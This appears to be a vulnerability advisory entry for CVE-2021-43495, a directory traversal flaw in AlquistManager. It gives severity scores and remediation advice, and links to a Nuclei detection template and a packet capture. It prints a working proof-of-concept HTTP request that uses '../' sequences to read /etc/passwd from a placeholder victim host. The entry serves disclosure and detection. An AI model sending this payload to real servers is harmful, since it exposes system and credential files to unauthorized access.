| Title | AlquistManager Local File Inclusion |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution. |
| Remediation | Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions. |
| CVSS Score | 7.5 |
| EPSS Score | 0.54584 |
| CVE ID | CVE-2021-43495 |
| CWE ID | CWE-22 |
| Tags | cve2021 cve lfi alquist alquistai vuln |
AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
GET /asd/../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43495.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-43495.pcap
N/AN/A